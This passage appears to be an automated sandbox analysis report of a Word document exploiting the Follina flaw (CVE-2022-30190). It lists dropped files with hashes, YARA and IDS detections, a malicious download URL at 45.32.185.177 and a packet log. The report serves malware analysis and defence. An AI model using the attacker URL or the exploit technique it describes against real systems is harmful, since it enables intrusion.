SHA-512:	3DF1F27301A68977BED559D5C45202ACF8C49ED24D3724A97E3704BBA37011497DCF1EEAE6210CC4E6C9E3C67F5DF3918C59A8C9B54BE77F8B7BC79DDED0DCC2
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.g@...cJ.......GS,...X.F...Fa.q.............................k16.dyD...l.M.Y...........Rs.WC.....^...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6894BD70-C9F6-4E64-BA1D-696172CE4314}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22107362032323508
Encrypted:	false
SSDEEP:	48:I3+UrBCvvr0SiJoteSOfgV5Vuz3iCX0kRke:K+CMrkadVdaPme
MD5:	AD8C750FDFC17D93C33BA3087D3FD555
SHA1:	50AE879216EC832CD5250C3D46FD62BB28ABAC32
SHA-256:	D70EF9A7ACC8DDF6827A899E8319116101A55544978060999A23F20BDD4A9334
SHA-512:	893467504A2A40CB35E09E91B0F335E0EEC6C1F0B88B490663753AB3A06312224EABECA3500A8C11CB0890C3C9CC2C5894772163196C74A28AFC19E2BAD67C08
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.c.2...N....f5-S,...X.F...Fa.q...............................s..zL..f S............w..LvL.6C.....P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.954300014527465
Encrypted:	false
SSDEEP:	3:yVlgsRlzIl7hWPYmQSeRSHkKzwINbRlVU276:yPblzIloPLBeUHkfIs22
MD5:	DD3EDE691A56C2D4DFF30FF5C39C0FA5
SHA1:	54F859A53C2215FBF11C0951DB71E2C93FE7EDFC
SHA-256:	38395295006CA6283B2629459D07F44B55D657303E9CEE979933FC9C72EF204A
SHA-512:	BBB5CE1A701CF1E097B9F94DDD7F8418EECD042429F6099707030ABD36D820F5EF32B0EB03F3DA4E2646228D35472A87A961D8B4E5FBA612BEBB6906EDFB0B87
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.6.8.9.4.B.D.7.0.-.C.9.F.6.-.4.E.6.4.-.B.A.1.D.-.6.9.6.1.7.2.C.E.4.3.1.4.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	5889
Entropy (8bit):	4.705994860110501
Encrypted:	false
SSDEEP:	96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
MD5:	EA48F95AB4F3CA3B0C687A726CB00C49
SHA1:	C473DB9C4D460D3F7801B506F289C04A04D3A50F
SHA-256:	CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
SHA-512:	394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
Malicious:	true
Yara Hits:	Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, Author: Joe Security
Reputation:	low
IE Cache URL:	http://45.32.185.177/123.RES
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5889
Entropy (8bit):	4.705994860110501
Encrypted:	false
SSDEEP:	96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
MD5:	EA48F95AB4F3CA3B0C687A726CB00C49
SHA1:	C473DB9C4D460D3F7801B506F289C04A04D3A50F
SHA-256:	CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
SHA-512:	394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
Malicious:	true
Yara Hits:	Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES, Author: Joe Security
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5889
Entropy (8bit):	4.705994860110501
Encrypted:	false
SSDEEP:	96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
MD5:	EA48F95AB4F3CA3B0C687A726CB00C49
SHA1:	C473DB9C4D460D3F7801B506F289C04A04D3A50F
SHA-256:	CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
SHA-512:	394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
Malicious:	true
Yara Hits:	Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES, Author: Joe Security
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	2.193335989623885
Encrypted:	false
SSDEEP:	24:rVDNK/njbEOAAneLn7nEWiQA56Be9134oTOAAneLnZnEWiQcm:rVcLYOATiQA56BKRTOA1iQx
MD5:	8B673A3336AF537A8BE96B8EA3048871
SHA1:	CFBCE6835C5B31AE7170F1039BFB2C76002F1DC3
SHA-256:	0F233D976207B3465D4C8BB3B7B8F977B8DA9BF43417A8B42E180A90FB99C2B4
SHA-512:	3CAE8109B4443479DCE7CEADCCC6992C39C46F7A77218570BD27C188FEF0529F7FED61F623DC4F8D555BFC909EF2025356A53D114BF5A77BE61C7B4EC3BCC817
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0FB641AE-A3C8-41BE-B49C-07E97C275C10}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A4DAF9D9-9403-4C16-9440-8C0CD34B4722}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	1.1455277829933739
Encrypted:	false
SSDEEP:	6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRUlQ/lfEz/RUlQ/lflKDmPm1Pc7:mbb2sOhYk5vnZABylAlY/ylAldIm5
MD5:	06F97D56780E4E8E5E513A038B6D23C5
SHA1:	AC6FD87B383193CAA33E86670AD51B6689A57661
SHA-256:	CF1AAF863CBFFBBB570286E2A20872BED7F36D039E3CE3A9FDCC0ECDBF5ED3B0
SHA-512:	E74962F10214651F89915ED590F2E241BA1B94DA120CCE87866BCF6F9AEA2B7AC532CEE81594F40DA501B66D553F017BC18BD678C2B8F5F702DB9BEC7AA83BD5
Malicious:	false
Preview:	....S.H.A.P.E. .X. .\.. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U.......j....U

C:\Users\user\AppData\Local\Temp\{2988F61F-4F9A-4845-AAA6-0600A931CA19}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025516343463298688
Encrypted:	false
SSDEEP:	6:I3DPcRoFvxggLRV6AK2RRgJgRXv//4tfnRujlw//+GtluJ/eRuj:I3DPsopAMwyvYg3J/
MD5:	99C66582A073466D851197E61D9E4977
SHA1:	72AD2E75939E0F352912BA79B5CA0F90A8A3F642
SHA-256:	4517A42130351BC4643AEF4246A09D32077F23EBFACEB9A4512E7C44E82C0289
SHA-512:	F9122690748F7C8C473B119FC203DB178FAD01CBB23879C3A9EF1902057E6765049E07E838966E4B50BBBB4413EABF935A5AF532C1D840553C68D29C533A8147
Malicious:	false
Preview:	......M.eFy...z.g@...cJ.......GS,...X.F...Fa.q................................[..F."9..7t...........Rs.WC.....^.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{DA1724A8-2EEB-4B4F-8C48-5E256737D51E}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025638993377216004
Encrypted:	false
SSDEEP:	6:I3DPcC1f5Z97FvxggLR/gtBMMRXv//4tfnRujlw//+GtluJ/eRuj:I3DPv1f5Z9dTgtCAvYg3J/
MD5:	2447DAB5C0393923C0417D2AF4471316
SHA1:	2EAF7E9074AB1AF9F59D7891C3411C1936411953
SHA-256:	C38E53967022743EB7D114B46270D960E0E0B2A9ADF0C8EA1A92FC16BA9078B5
SHA-512:	4E2605ECCD95759397D9ECFF989CB76B6836A63621E8C8EE8D6C6080978F9A4248A9F87C57FE9825CE14FA65AC90F82ECC757C3710C5728E5A04B443E391F6E9
Malicious:	false
Preview:	......M.eFy...z;'wu_.B........S,...X.F...Fa.q...................................A..l..S.5.............9.B..}.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc1712.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:55 2022, mtime=Tue Mar 8 15:45:55 2022, atime=Tue Jun 7 23:33:14 2022, length=10142, window=hide
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.523969906389643
Encrypted:	false
SSDEEP:	12:8gRgXg/XAlCPCHaXBKBnB/xQpX+Ws2ai84icvbIS2nYla7SNDtZ3YilMMEpxRljM:8o/XTRKJINt8reES/lomDv3q3Y7h
MD5:	D2B1BED3040717B5D022C32C68292CE1
SHA1:	06D6D2EECD5F069300DC1E8D0D2919BFA0503C97
SHA-256:	E7B2E0BC2D533C2854B5C2E5ADF17D643A2DFA419D0F1B8E8D39041ED8578F0C
SHA-512:	960A7C525816FFA978DF78558CA25B93C2353F4C7CDE7239940297879C3A798047FD768E1C586568EA0C1F7514D21883779D5F494A8F0EEAE43A10DCD0E4C75E
Malicious:	false
Preview:	L..................F.... ........3.......3..X.W.z...'...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2..'...T(. .DOC171~1.DOC..F......hT..hT..*...r.....'...............d.o.c.1.7.1.2...d.o.c.x.......v...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\doc1712.docx.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.1.7.1.2...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9...N..... .....[D_....3N...W...9...N..... .....[

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.597075278863427
Encrypted:	false
SSDEEP:	3:bDuMJlZVUNzCmxWKVUNzCv:bCSVUDUy
MD5:	2E496A3F1C20211051285A980DADA39A
SHA1:	B980277016A7BCCC0E108CD9A00E82AF61433394
SHA-256:	B466FF5520F73BD086D77160EB4D437F0AA73747604E1318E3BF3C220D218763
SHA-512:	3104FE77ABF38AC191DC43C0BC437017B1A07804238503A6F8D2A3762F48E96E687BF0EB98FEF36E9FFC3451820E6D54BB00AE01B789779CDD10AAE61302E547
Malicious:	false
Preview:	[folders]..Templates.LNK=0..doc1712.LNK=0..[misc]..doc1712.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
MD5:	1674A1C7C99CD9FAADA789F5E2AEB335
SHA1:	26D9E81D5ED584A899A94D5EA8945A5AE3403F85
SHA-256:	BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
SHA-512:	B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

C:\Users\user\Desktop\~$oc1712.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
MD5:	1674A1C7C99CD9FAADA789F5E2AEB335
SHA1:	26D9E81D5ED584A899A94D5EA8945A5AE3403F85
SHA-256:	BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
SHA-512:	B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

Static File Info

General

File type:	Microsoft OOXML
Entropy (8bit):	7.869586027326007
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	doc1712.docx
File size:	10142
MD5:	7a91b01a037ccbfe6589161643d0a65a
SHA1:	53658a5b5bc577d601e23ae77a34cb44dcba1f27
SHA256:	f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60
SHA512:	f1accdbe0ea88f717f7473818df6ee72fc77077c1a145bb872863bb0bb681cb59b653dd6927e68fd2b9e8942b7498c5e7e8ab26c8d0aece3c9fcc21e580ad100
SSDEEP:	192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ7S/bQ7dlJ78:snPj8I10lD9+2Vvxm/bqlJ78
TLSH:	29229E36D65508B1CAD7A279E0AC1A19E30C41BBA37BE9CB61C663E412C86DF0F5530C
File Content Preview:	PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!\|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
45.32.185.177192.168.2.2280491762036726 06/07/22-17:33:41.296228	TCP	2036726	ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)	80	49176	45.32.185.177	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 7, 2022 17:33:28.018767118 CEST	49173	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:28.041985989 CEST	80	49173	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:28.042093992 CEST	49173	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:28.042892933 CEST	49173	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:28.065942049 CEST	80	49173	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:28.066274881 CEST	80	49173	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:28.066356897 CEST	49173	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:33.067442894 CEST	80	49173	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:33.067533016 CEST	49173	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:33.984051943 CEST	49174	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:34.007215023 CEST	80	49174	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:34.007349968 CEST	49174	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:34.007536888 CEST	49174	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:34.030474901 CEST	80	49174	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:34.030771017 CEST	80	49174	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:34.238008022 CEST	49174	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:34.256355047 CEST	80	49174	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:34.256531000 CEST	49174	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:38.161386013 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:38.184550047 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:38.184705973 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:38.184900045 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:38.207914114 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:38.208200932 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:38.419167995 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:38.436250925 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:38.436436892 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:39.031132936 CEST	80	49174	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:39.031232119 CEST	49174	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:39.031289101 CEST	49174	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:39.054394960 CEST	80	49174	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:39.330252886 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:39.353648901 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:39.353693008 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:39.558034897 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:39.580319881 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:39.580566883 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.189172983 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.212749958 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.212960005 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.242566109 CEST	49173	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.243115902 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.265652895 CEST	80	49173	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.265860081 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.265966892 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.273190975 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.295975924 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.296227932 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.296260118 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.296288013 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.296314001 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.296315908 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.296334028 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.296344042 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.296374083 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.296389103 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.430147886 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:41.440367937 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:41.440541029 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:42.952044010 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:42.974982023 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:42.975111008 CEST	80	49176	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:42.975275993 CEST	49176	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:43.084708929 CEST	49177	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:43.107714891 CEST	80	49177	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:43.107907057 CEST	49177	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:43.125586987 CEST	49177	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:43.148494959 CEST	80	49177	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:43.148684025 CEST	80	49177	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:43.395939112 CEST	80	49177	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:43.396003962 CEST	49177	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:43.396056890 CEST	49177	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:44.479470015 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:44.502660036 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:44.502847910 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:44.706597090 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:44.728271961 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:44.728430033 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:45.477780104 CEST	49175	80	192.168.2.22	45.32.185.177
Jun 7, 2022 17:33:45.501329899 CEST	80	49175	45.32.185.177	192.168.2.22
Jun 7, 2022 17:33:45.540532112 CEST	49176	80	192.168.2.22	45.32.185.177
